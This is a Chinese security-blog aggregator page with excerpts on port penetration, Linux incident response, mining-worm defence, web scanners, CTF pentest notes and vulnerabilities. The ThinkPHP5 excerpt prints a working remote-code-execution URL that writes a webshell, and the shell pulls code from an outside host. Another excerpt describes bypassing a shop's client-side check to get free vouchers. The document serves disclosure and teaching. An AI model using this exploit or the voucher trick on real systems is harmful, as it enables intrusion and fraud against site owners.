漏洞

端口渗透

允我心安 提交于 2019-12-26 15:48:33
端口渗透总结 0x00 背景 端口渗透过程中我们需要关注几个问题: 1、 端口的banner信息 2、 端口上运行的服务 3、 常见应用的默认端口 当然对于上面这些信息的获取,我们有各式各样的方法,最为常见的应该就是nmap了吧!我们也可以结合其他的端口扫描工具,比如专门的3389、1433等等的端口扫描工具; 服务默认端口 公认端口(Well Known Ports):0-1023,他们紧密绑定了一些服务; 注册端口(Registered Ports):1024-49151,他们松散的绑定了一些服务; 动态/私有:49152-65535,不为服务分配这些端口; 当然这些端口都可以通过修改来达到欺骗攻击者的目的,但是这就安全了吗?攻击者又可以使用什么攻击方式来攻击这些端口呢? 还需要注明的一点是:很多木马工具也有特定的端口,本文并没有涉及到这块的内容,大家可以自己去收集收集! 关于爆破之我见 在对这些端口进行实战讲解时,我需要先阐述一下我对爆破这个方式的一些看法; 爆破:技术最简单,需要的技术能力基本为0,工作效率与网络、硬件等相关,在我看来爆破其实是最强大的攻击方式,特别是结合一些特制的字典,结合社工我们可以在很短的时间达到最大的效果,只不过因为我们的pc或者字典不够强大,所以很多时候我们不能进行一次优秀的爆破攻击;当然现在很多web应用以及服务端口都限制了暴力破解

【讲清楚,说明白!】 Linux系统应急响应流程

牧云@^-^@ 提交于 2019-12-25 22:09:15
目录: (一)概述 (二)识别现象 (三)闭环兜底 (四)打上常见Web漏洞补丁 (一)概述 (1.1)Linux环境下处理应急响应事件往往更加棘手,因为相比于Windows系统,Linux没有像procexp这样的应急响应利器,也没有统一的应急响应处理流程。所以我们需要对流程进行梳理,系统化地处理Linux环境下的应急事件。 (1.2)处理Linux应急响应主要分为4个环节:识别现象->清除病毒->闭环兜底->系统加固 (1.3)首先从用户场景的主机异常现象触发,先识别出病毒的可疑现象。然后定位到具体的病毒进程以及病毒文件,进行清除。完成前2步还不够,病毒一般会通过一些自启动项及守护程序进行重复感染,所以我们要执行闭环兜底确保病毒不再被创建。将主机上的病毒项清除干净后,最后就是进行系统加固,防止病毒从Web再次invade进来。这4个环节,构成一个完整的应急响应处理流程。 (二)识别现象 (2.1)第一个环节要求我们通过系统运行状态、安全设备告警,发现主机异常现象,以及确认病毒的可疑行为。通过top命令枚举进程,使用CPU降序排序,如果CPU占用率超过70%且名字比较可疑的进程,大概率就是挖矿病毒了。 # top---枚举进程,使用CPU降序排序 (2.2)使用ps命令枚举进程,发现是否存在可疑进程,病毒一般都是携带可疑的命令行,当你发现命令行中带有url等奇怪的字符串时

挖矿蠕虫肆虐,详解云防火墙如何轻松“制敌”

随声附和 提交于 2019-12-25 18:31:10
根据阿里云安全团队发布的《2018年云上挖矿分析报告》显示,过去一年中,每一波热门0 Day的出现都伴随着挖矿蠕虫的爆发性传播,挖矿蠕虫可能因为占用系统资源导致业务中断,甚至还有部分挖矿蠕虫同时会捆绑勒索病毒(如XBash等)给企业带来资金与数据的损失。 如何提升企业的安全水位,抵御挖矿蠕虫的威胁成为每个企业都在思考的问题。本文以云上环境为例,从挖矿蠕虫的防御、检测和入侵后如何迅速止血三方面来阐述阿里云云防火墙如何全方位抵御挖矿蠕虫。 1.挖矿蠕虫的防御 1.1 挖矿蠕虫的传播方式 据阿里云安全团队观察,云上挖矿蠕虫主要利用网络上普遍存在的通用漏洞和热门的0 Day/N Day漏洞进行传播。 1.1.1 通用漏洞利用 过去一年挖矿蠕虫普遍会利用网络应用上广泛存在的通用漏洞(如配置错误、弱密码等)对互联网持续扫描和攻击,以对主机进行感染。下表是近期活跃的挖矿蠕虫广泛利用的通用漏洞: 1.1.2 0 Day/N Day漏洞利用 0 Day/N Day在网络上未被修复的窗口期也会被挖矿蠕虫利用,迅速进行大规模的感染。下表是近期活跃的挖矿蠕虫利用过的热门0 Day/N Day漏洞: 1.2 挖矿蠕虫的防御 针对这两类利用方式,阿里云云防火墙作为业界首款公共云环境下的SaaS化防火墙,应用可以透明接入,可以对云上进出网络的恶意流量进行实时检测与阻断,在防御挖矿蠕虫方面有着独特优势。 1.2

十九款web漏洞扫描工具

泄露秘密 提交于 2019-12-25 14:10:30
1. Arachni Arachni是一款基于Ruby框架搭建的高性能安全扫描程序,适用于现代Web应用程序。可用于Mac、Windows及Linux系统的可移植二进制文件。 Arachni不仅能对基本的静态或CMS网站进行扫描,还能够做到对以下平台指纹信息((硬盘序列号和网卡物理地址))的识别。且同时支持主动检查和被动检查。 Windows、Solaris、Linux、BSD、Unix Nginx、Apache、Tomcat、IIS、Jetty Java、Ruby、Python、ASP、PHP Django、Rails、CherryPy、CakePHP、ASP.NET MVC、Symfony 一般检测的漏洞类型包括: NoSQL/Blind/SQL/Code/LDAP/Command/XPath注入 跨站请求伪造 路径遍历 本地/远程文件包含 Response splitting 跨站脚本 未验证的DOM重定向 源代码披露 另外,你可以选择输出HTML、XML、Text、JSON、YAML等格式的审计报告。 Arachni帮助我们以插件的形式将扫描范围扩展到更深层的级别。Arachni的详细介绍与下载地址:click here 。 2. XssPy 一个有力的事实是,微软、斯坦福、摩托罗拉、Informatica等很多大型企业机构都在用这款基于python的XSS(跨站脚本

渗透测试笔记——入门篇

谁说我不能喝 提交于 2019-12-25 04:41:15
本文作者:wasrehpic 0×00 前言 本题算是一道较为综合的渗透题,要求对两个服务器系统进行渗透,第一个是基于齐博 CMS 的信息资讯平台 http:www.test.ichunqiu,第二个是基于 Discuz! 的论坛社区 http:bbs.test.ichunqiu。 这两个 CMS 同样能在网上找到许多漏洞,常用作 渗透测试 的练习靶机。根据提示,第 1 题要求找到咨询平台的管理员账号密码;第 2 题需要登录服务器后台,并插入木马,再用 中国菜刀 连接,继而找到在管理员桌面上的 flag 文件;第 3 题要求在论坛社区的数据库中找到 admin 账户的 salt 值。 题目链接: https://www.ichunqiu.com/battalion?t=2&r=54399 解题链接: https://www.ichunqiu.com/vm/50629/1 0×01 获取 www.test.ichunqiu 后台登录密码 利用 SQL 报错注入是获取管理员账号密码的常见方法。在浏览器搜索齐博 CMS 的可利用漏洞,其中发现了一个 SQL 报错注入漏洞,在 /member/special.php 中的 $TB_pre 变量未初始化,未作过滤,且直接与代码进行拼接,注入发生后可在报错信息中看到管理员的账号密码。详情可参考: 齐博CMS整站系统SQL注入 下面打开

从团购网的漏洞看网站安全性问题

久未见 提交于 2019-12-25 03:53:41
自从9月份在同事推荐下在某团购网买了一份火锅的套餐后,就迷上了,几乎每天必去浏览一遍,看看有什么又便宜又好吃的。 元旦期间当然也不例外,1号那天上午,看到了XXX团购网的“VIP会员0元领红包”活动,0元?我最喜欢了,虽然参与过 很多次0元抽奖的活动,一次也没中,但是人总是有一种信念相信自己的运气的。于是果断进去注册,点击购买,进入了购物车 再点击确认订单,恩?怎么alert这么一句“本活动只限VIP会员参与”?我第一反应是去看页面源代码(由于该活动已经结束, 进不去购买页面了,所以在这里我只好用伪代码来表示): //确认订单按钮的点击事件function btn_click(){ ajax获取当前用户的类型 如果不是VIP,alert("本活动仅限VIP会员参与"); 否则 form1.submit();} 然后我在地址栏敲入:javascript:form1.submit(); 回车! 进入付款页面了,再点击确定,恩?购买成功!我获得了5元红包! 太给力了!!!我又新注册一个账号,重复上面的步骤,也成功获得了5元红包。 马上给客服留言说明此BUG,不过到今天还没回复我,呵呵。 这个漏洞的关键点是开发人员忘记了在form1.submit()的后台代码中判断当前用户是否VIP会员,只依赖于javascript的验证。 前台的验证顶啥用啊,完全可以绕过去,后台的验证才最重要!!

THINKPHP5近期暴露的漏洞

匆匆过客 提交于 2019-12-24 18:01:45
这个THINKPHP5的漏洞涉及好几个版本,我测试中5.0.21和5.0.22都有,据说是5.0 ~ 5.0.23之间的版本都存在,这个漏洞可以执行写文件的操作。 当然了,赶紧升级框架到安全版本是比较好的方式,不过我这边测试了一下,发现确实可以通过url访问注入进行执行写文件操作,例如 http://你的域名/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20@eval(file_get_contents("http%3a%2f%2fcqy666.cn%2fphp.jpg"))?^>>test.php 之后在public下面发现了一个PHP文件 是 test.php 内容如下 访问test.php发现 我本地执行是这样的 然后就没有然后了 多么可怕! 网上有人说的解决方案是找到 thinkphp/library/think/App.php文件第556行那里 改为 对控制器进行一次过滤,当然为了保险还是要把配置的路由那里改一下 'url_route_on' => true, 来源: https://www.cnblogs.com/lizhaoyao/p/10439130.html